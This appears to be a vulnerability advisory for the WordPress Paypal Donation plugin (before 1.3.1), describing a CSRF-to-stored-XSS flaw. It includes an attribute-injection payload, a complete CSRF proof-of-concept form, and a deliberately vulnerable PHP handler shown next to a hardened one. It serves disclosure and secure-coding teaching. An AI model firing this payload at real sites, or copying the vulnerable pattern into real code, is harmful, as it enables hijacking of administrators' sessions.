wpexploit / dc11
WPEX-ID: 5C73754C-EEBE-424A-9D3B-CA83EB53BF87
History: Oct 04, 2021 - 12:00 a.m.

Paypal Donation < 1.3.1 - CSRF to Stored Cross-Site Scripting


EPSS: 0.001 (Low)
EPSS Percentile: 29.8%

The plugin offers a function to create donation buttons, which internally are posts. The process to create a new button lacks a CSRF check (no nonce is verified on the request), so an attacker can make an authenticated admin who visits a malicious page create a new button without knowing it. Furthermore, one of the Button fields (the Amount Menu Name) is not escaped before being output in an HTML attribute when editing a Button, leading to a Stored Cross-Site Scripting issue as well: the injected event handler runs in the admin's browser when the Button's edit form is opened.

Create/Edit a Button and put the following payload in the Amount Menu Name field (wpedon_button_scpriceprice parameter). The leading double quote closes the attribute value, autofocus/onfocus fire the handler without any user interaction, and the trailing e= soaks up the attribute's original closing quote as a harmless dummy attribute:

" autofocus=autofocus onfocus=alert(/XSS/) e=

Via CSRF:

<html>
  <body>
    <!-- example.com stands for the target WordPress site; the victim must be logged in there as an admin -->
    <form action="https://example.com/wp-admin/admin.php?page=wpedon_buttons&action=new" method="POST">
      <input type="hidden" name="wpedon_button_name" value="Test" />
      <input type="hidden" name="wpedon_button_price" value="" />
      <!-- Amount Menu Name field: stored unescaped and later written into an attribute of the edit form -->
      <input type="hidden" name="wpedon_button_scpriceprice" value='" autofocus=autofocus onfocus=alert(/XSS/) e=' />
      <!-- "update" is the submit parameter the save handler looks for -->
      <input type="hidden" name="update" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

The name, price and id params are not required, but they are displayed on the buttons overview and can be used to attract the victim's attention so that they open the Button for editing.

The XSS triggers when the affected Button is edited: autofocus moves focus to the injected input as soon as the edit form loads, and the onfocus handler runs.
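For contrast, the following added example (written for this page, not the plugin's own code) shows the two defects side by side with a hardened version of the same save handler and edit form. The WordPress APIs used (check_admin_referer, wp_nonce_field, current_user_can, sanitize_text_field, esc_attr, wp_insert_post, update_post_meta) are real; every function name, the post type and the nonce action/field names prefixed wpedon_example_ are hypothetical, and only the request parameter names are taken from the PoC above.

```php
<?php
/*
 * Added example, not the plugin's code. Function names, the post type and the
 * nonce action/field names (wpedon_example_*) are hypothetical; the request
 * parameter names match the PoC on this page.
 */

// --- Vulnerable pattern: no nonce check, no capability check, raw output ----
function wpedon_example_save_button_vulnerable() {
    if ( ! isset( $_POST['update'] ) ) {
        return;
    }
    // Any POST reaching this admin page is trusted, so a forged cross-site
    // form submitted by a logged-in admin creates a button (CSRF).
    $post_id = wp_insert_post( array(
        'post_type'   => 'wpedon_example_button',   // hypothetical post type
        'post_status' => 'publish',
        'post_title'  => $_POST['wpedon_button_name'],
    ) );
    update_post_meta( $post_id, 'price',        $_POST['wpedon_button_price'] );
    update_post_meta( $post_id, 'scpriceprice', $_POST['wpedon_button_scpriceprice'] );
}

function wpedon_example_edit_form_vulnerable( $post_id ) {
    $menu_name = get_post_meta( $post_id, 'scpriceprice', true );
    // The stored value is dropped straight into an attribute. A value such as
    //   " autofocus=autofocus onfocus=alert(/XSS/) e=
    // closes value="" and adds event-handler attributes (stored XSS).
    echo '<input type="text" name="wpedon_button_scpriceprice" value="' . $menu_name . '">';
}

// --- Hardened pattern -------------------------------------------------------
function wpedon_example_save_button_hardened() {
    if ( ! isset( $_POST['update'] ) ) {
        return;
    }
    // 1. Only users allowed to administer the plugin may create buttons.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    // 2. CSRF: the request must carry a valid nonce bound to this action and
    //    the current user. check_admin_referer() dies on a missing/invalid one.
    check_admin_referer( 'wpedon_example_save_button', '_wpedon_example_nonce' );

    // 3. Normalise input before storing it (does NOT make output safe on its own).
    $name      = sanitize_text_field( wp_unslash( $_POST['wpedon_button_name'] ?? '' ) );
    $price     = sanitize_text_field( wp_unslash( $_POST['wpedon_button_price'] ?? '' ) );
    $menu_name = sanitize_text_field( wp_unslash( $_POST['wpedon_button_scpriceprice'] ?? '' ) );

    $post_id = wp_insert_post( array(
        'post_type'   => 'wpedon_example_button',
        'post_status' => 'publish',
        'post_title'  => $name,
    ) );
    update_post_meta( $post_id, 'price',        $price );
    update_post_meta( $post_id, 'scpriceprice', $menu_name );
}

function wpedon_example_edit_form_hardened( $post_id ) {
    $menu_name = get_post_meta( $post_id, 'scpriceprice', true );
    $action    = admin_url( 'admin.php?page=wpedon_buttons&action=edit&id=' . (int) $post_id );
    echo '<form method="post" action="' . esc_url( $action ) . '">';
    // Nonce field checked by the save handler; a cross-origin page cannot read it.
    wp_nonce_field( 'wpedon_example_save_button', '_wpedon_example_nonce' );
    // 4. esc_attr() turns " into &quot; so the whole payload stays inside the
    //    value and no extra attributes are created.
    echo '<input type="text" name="wpedon_button_scpriceprice" value="' . esc_attr( $menu_name ) . '">';
    echo '<input type="submit" name="update" value="Save">';
    echo '</form>';
}
```

Two points worth keeping in mind when auditing a fix for this class of bug: sanitize_text_field() leaves double quotes in place, so input sanitisation alone does not close the attribute-injection path, and the nonce check must sit in the handler that performs the write, not only in the page that renders the form, because the CSRF page above never loads that form at all.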
